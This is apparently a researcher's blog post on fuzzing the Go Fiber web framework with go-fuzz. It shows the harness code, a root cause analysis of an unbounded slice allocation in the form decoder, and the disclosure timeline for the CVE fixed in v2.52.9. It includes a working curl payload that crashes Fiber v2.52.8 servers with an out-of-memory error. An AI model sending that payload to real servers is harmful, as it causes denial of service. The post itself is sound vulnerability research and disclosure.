Crashing Fiber via go-fuzz
For the past couple of months (albeit very sporadically), I have been getting my feet wet in the world of fuzzing. I have been alluding to “fuzzing experiments” in my recent blogs - and I am happy to report that my experiments have yielded a result! I found an exploitable crash in the Fiber framework. When using Fiber’s Ctx.BodyParser to parse form data containing a large numeric key that represents a slice index (e.g., test.18446744073704), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder. The issue was discovered in Fiber v2.52.8, has been fixed in v2.52.9, and has been assigned CVE-2025-54801.
Background
I started experimenting with fuzzing earlier this year, around March - April. I began with the “traditional” fuzzing route - fuzzing a binary using AFL++. Getting started was not too difficult. I found a lot of resources on how to set up AFL++ for macOS. At the time I was still using a MacBook with an Intel chip - so I don’t know if I would have encountered additional challenges on Apple Silicon - but on my MacBook, setting up AFL++ was fairly straightforward. In fact, I just got it off brew. Understanding basic usage of AFL++ was also not too difficult. Along the way, I learnt a little bit about Make and CMake, and built many binaries.
What I realized though is:
- I did not understand how to develop fuzzing harnesses. I tried using ChatGPT to write them for me - but did not achieve much success. This was primarily because I was trying to get AI to do something I did not know how to do - and therefore I could not explain to it what I wanted or what was going wrong.
- Even when I found a crash, I was not able to dive deeper into it due to my limited understanding of assembly and limited experience with using llvm or gdb.
Due to these challenges, fuzzing binaries using AFL++ proved to be much more challenging than I had anticipated. This is a skill I definitely wish to pick up but for the time being it will have to wait.
Enter Go Fuzzing
Sometime later, while looking at something completely unrelated, I discovered that Go provides a fuzzing framework. They also provide a tutorial for it - which is fairly easy to follow. I experimented with this (i.e. did the tutorial) and found that it was much more intuitive to me than fuzzing binaries.
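For anyone who has not used it, a native Go fuzz test is just a test function whose name starts with Fuzz and that takes a *testing.F. Here is a minimal sketch of my own in the spirit of the tutorial - the target, url.ParseQuery, is a placeholder I picked, not something from the tutorial:
package example

import (
    "net/url"
    "testing"
)

// FuzzParseQuery is a minimal native Go fuzz test. We only care about
// panics or crashes; parse errors are expected for malformed input.
func FuzzParseQuery(f *testing.F) {
    f.Add("a=1&b=2") // seed corpus entry
    f.Fuzz(func(t *testing.T, s string) {
        _, _ = url.ParseQuery(s)
    })
}
Running go test -fuzz=FuzzParseQuery keeps mutating inputs until one of them crashes the target or fails the test.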
My next step was to find a target I could fuzz. My initial plan was to look at Go itself. I work with a lot of Go CVEs at my job - so naturally I wanted to find a CVE in Go. My thought process was:
- Look at existing CVEs in Go using the Go Vulnerability Database.
- Determine if any of these were the types of vulnerabilities typically found by fuzzing (e.g., file parsing issues, out-of-memory errors, etc.).
- This required looking for a disclosure report of the CVE that had at least a proof-of-concept or some technical details about the vulnerability.
- Pick one or two of the standard packages where such CVEs exist.
- Fuzz
Step 2.1 proved to be more involved than I anticipated. I did not find technical information on the CVEs that explained how they were discovered or provided payloads that could trigger the issue. If I had looked long enough, I probably would have found a few technical reports for these CVEs, but I did not. I could have looked for interesting functionality in Go’s standard packages directly too - but Go has a lot of standard packages - and I don’t write Go code - so I did not know where to begin looking.
Instead, I looked into CVEs in open source projects. A lot of open source projects accept reports through GitHub - and many times the advisory contains the complete original report. So my revised steps were:
- Look at CVEs in Go vulnerability database.
- Determine if any of these vulnerabilities had associated advisories on GitHub that contained the complete report.
- If they did, determine if a similar outcome can be achieved through fuzzing.
- If yes, fuzz the relevant components of the project.
Soon enough, I found this advisory for Fiber which described a crash in Ctx.BodyParser. The setup was pretty simple:
- Create a server using Fiber.
- Send it malformed data.
- The server panics and crashes when given certain crafted inputs.
This is very fuzzable. I just need to create a server and then run a fuzzer to bombard the server with all kinds of weird input.
Fuzzing Fiber
From the README:
Fiber is an Express inspired web framework built on top of Fasthttp, the fastest HTTP engine for Go. Designed to ease things up for fast development with zero memory allocation and performance in mind.
It seems to be a pretty popular framework - as shown by the 1.8k forks and 37.3k stars.
I started the fuzzing experiment using Go’s provided fuzzing framework. Running it a couple of times, I had one main complaint - it stopped every time the program crashed. I wanted to keep it running for a long time and collect all the crashes, like AFL++ does. I tried using ChatGPT to work around this design, and eventually I gave up.
Next, I tried go-fuzz, an open source Go fuzzing framework. The downside is that it is no longer maintained. My guess is that it was developed before Go supported fuzzing natively and abandoned once inbuilt support arrived. Anyway, it worked much better for my exploration.
I created a simple server:
package main

import (
    "fmt"
    "net/http"

    "github.com/gofiber/fiber/v2"
)

type RequestBody struct {
    NestedContent []*struct{} `form:"test"`
}

func main() {
    app := fiber.New()

    app.Post("/", func(c *fiber.Ctx) error {
        formData := RequestBody{}
        if err := c.BodyParser(&formData); err != nil {
            fmt.Println(err)
            return c.SendStatus(http.StatusUnprocessableEntity)
        }
        return nil
    })

    fmt.Println(app.Listen(":3000"))
}
And a simple fuzzing harness:
package fuzz

import (
    "github.com/gofiber/fiber/v2"
    "github.com/valyala/fasthttp"
)

type RequestBody struct {
    NestedContent []*struct {
        Value string `form:"value"`
    } `form:"nested-content"`
}

var app *fiber.App

func init() {
    app = fiber.New()
}

// fuzzParse builds a fake request with the given content type and body,
// then runs it through Ctx.BodyParser.
func fuzzParse(contentType string, data []byte) error {
    fctx := &fasthttp.RequestCtx{}
    c := app.AcquireCtx(fctx)
    defer app.ReleaseCtx(c)

    c.Request().Header.SetContentType(contentType)
    c.Request().SetBody(data)

    var parsed RequestBody
    return c.BodyParser(&parsed)
}

// Fuzz is the entry point go-fuzz expects. Returning 1 tells go-fuzz the
// input was interesting and should be prioritized in the corpus; 0 means
// it was not.
func Fuzz(data []byte) int {
    // Try JSON parsing
    if err := fuzzParse("application/json", data); err == nil {
        return 1
    }
    // Try form parsing
    if err := fuzzParse("application/x-www-form-urlencoded", data); err == nil {
        return 1
    }
    return 0
}
And let go-fuzz do its thing.
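For reference, the commands to build and run the harness look roughly like this - the fuzz-fuzz.zip name comes from my harness package being called fuzz, so adjust it to your own layout:
go install github.com/dvyukov/go-fuzz/go-fuzz@latest
go install github.com/dvyukov/go-fuzz/go-fuzz-build@latest
go-fuzz-build
go-fuzz -bin=./fuzz-fuzz.zip -workdir=out
go-fuzz-build produces an instrumented archive for the package in the current directory, and go-fuzz then mutates inputs and keeps crashing inputs (with their stack traces) under the work directory.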
Eventually, go-fuzz found a few crashes. Some of them had inputs like NeſTED-content.18446744073704. A similar crash had previously been discovered by Go’s inbuilt fuzzer. The key difference (and this may be a result of my harness) was that for the crash found by go-fuzz, the error was
runtime: out of memory: cannot allocate 147573956411392-byte block (3866624 in use)
fatal error: out of memory
while Go’s inbuilt fuzzer just said killed.
Reviewing the two crashes, I believe this was because the go-fuzz request also had Content-Type: application/x-www-form-urlencoded set. In short, I could have saved a lot of time if my original harness for Go’s inbuilt fuzzer had included the content type. Oh well, you live and you learn.
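For completeness, a content-type-aware harness for Go’s inbuilt fuzzer would look something like the sketch below. The function name and the seed input are my own choices, and it reuses the RequestBody struct from the harness above:
package fuzz

import (
    "testing"

    "github.com/gofiber/fiber/v2"
    "github.com/valyala/fasthttp"
)

// FuzzBodyParser exercises Ctx.BodyParser with the form content type set,
// so the form-decoding path is actually reached.
func FuzzBodyParser(f *testing.F) {
    app := fiber.New()
    f.Add([]byte("nested-content.0.value=x")) // seed resembling valid form data
    f.Fuzz(func(t *testing.T, data []byte) {
        fctx := &fasthttp.RequestCtx{}
        c := app.AcquireCtx(fctx)
        defer app.ReleaseCtx(c)

        c.Request().Header.SetContentType("application/x-www-form-urlencoded")
        c.Request().SetBody(data)

        var parsed RequestBody
        _ = c.BodyParser(&parsed) // parse errors are fine; crashes are what we want
    })
}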
Anyway, the curl command for a request that causes the crash is:
curl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \
-H 'Content-Type: application/x-www-form-urlencoded'
Sending this payload to a server running Fiber v2.52.8 and below will crash the server due to an out of memory error.
Root Cause Analysis
The root cause of this issue lies within the decoder’s decode method:
idx := parts[0].index
if v.IsNil() || v.Len() < idx+1 {
    value := reflect.MakeSlice(t, idx+1, idx+1) // <-- Panic/crash occurs here when idx is huge
    if v.Len() < idx+1 {
        reflect.Copy(value, v)
    }
    v.Set(value)
}
The idx variable is not validated before use, leading to an unsafe slice allocation for extremely large values. If the value is large enough, the process crashes with an out-of-memory error.
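To make the numbers concrete, here is a standalone snippet of my own (not the decoder’s code) that mirrors the allocation: with an 8-byte pointer element type, an index of 18446744073704 makes reflect.MakeSlice request a single block of roughly 147 TB, and the runtime aborts with a fatal out-of-memory error.
package main

import (
    "fmt"
    "reflect"
)

func main() {
    // Illustration only: mirrors what the schema decoder does when it sees
    // a form key like test.18446744073704.
    idx := 18446744073704
    sliceType := reflect.TypeOf([]*struct{}{}) // 8-byte pointer elements

    fmt.Printf("requesting %d bytes\n", (idx+1)*8)
    _ = reflect.MakeSlice(sliceType, idx+1, idx+1) // fatal error: out of memory on typical machines
}
Because this is a runtime fatal error rather than a panic, it cannot be caught with recover - which is what makes the crash such an easy denial of service.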
CVSS v4 score
Base Score: 8.7 (High)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Fix
This issue has been fixed by this PR, which adds checks that prevent excessively large index values in the parsers, resolving the issue I reported.
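I have not copied the patch here, but the general shape of such a guard is roughly the following - the constant name, the limit, and the helper function are placeholders of mine, not the code from the PR:
package schema

import (
    "errors"
    "fmt"
)

// maxIndex is a placeholder bound of my own; the actual fix picks its own limit.
const maxIndex = 1000

var errIndexTooLarge = errors.New("schema: slice index too large")

// checkIndex sketches the kind of validation performed before an
// attacker-controlled index is ever passed to reflect.MakeSlice.
func checkIndex(idx int) error {
    if idx < 0 || idx > maxIndex {
        return fmt.Errorf("%w: %d", errIndexTooLarge, idx)
    }
    return nil
}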
Conclusion
I have this habit of not sticking to one thing. I like trying new things more than improving my skills in an “old” thing. This also holds true in my escapades with security research. I am trying to restrict myself to two areas:
- Running free SAST tools
- Go fuzzing
At the beginning of the year, my goal was to find 5 CVEs in 2025. I have since slightly altered the goal to find 5 vulnerabilities. Sometimes things don’t go your way and you don’t get a CVE assigned to your finding (see my last blog). So with this one, I am at 3. And would you look at that - I managed to publish 2 blogs in ~ 6 weeks!
I am attending BlackHat and Defcon again this year. My 2nd BlackHat and 3rd Defcon. This time I have given myself a few challenges to engage with the community. There are 16 in total. I hope to be able to complete them - and then write about them for my next post (primarily to cheat on increasing the count of articles on this blog without doing security research). Thanks for reading, as always.
Timeline
- May 29, 2025: Reported issue to Fiber maintainers through email.
- June 10, 2025: Sent a follow up email asking if my report was reviewed.
- June 12, 2025: Received a response from Fiber security acknowledging the issue.
- June 26, 2025: Requested a CVE once the issue is fixed.
- July 22, 2025: Sent a follow-up email asking for an update regarding the fix and CVE assignment.
- July 29, 2025: Tested the issue in Fiber v2.52.9 and found it to be fixed. Sent another email requesting a CVE assignment since the issue had been fixed.
- July 30, 2025: Reached out to a Fiber maintainer via Discord.
- July 30, 2025: Received a prompt response from the maintainer on Discord. (Maybe I had been barking up the wrong tree.)
- August 1, 2025: Drafted the GHSA as recommended by maintainer.
- August 5, 2025: GHSA published, blog published.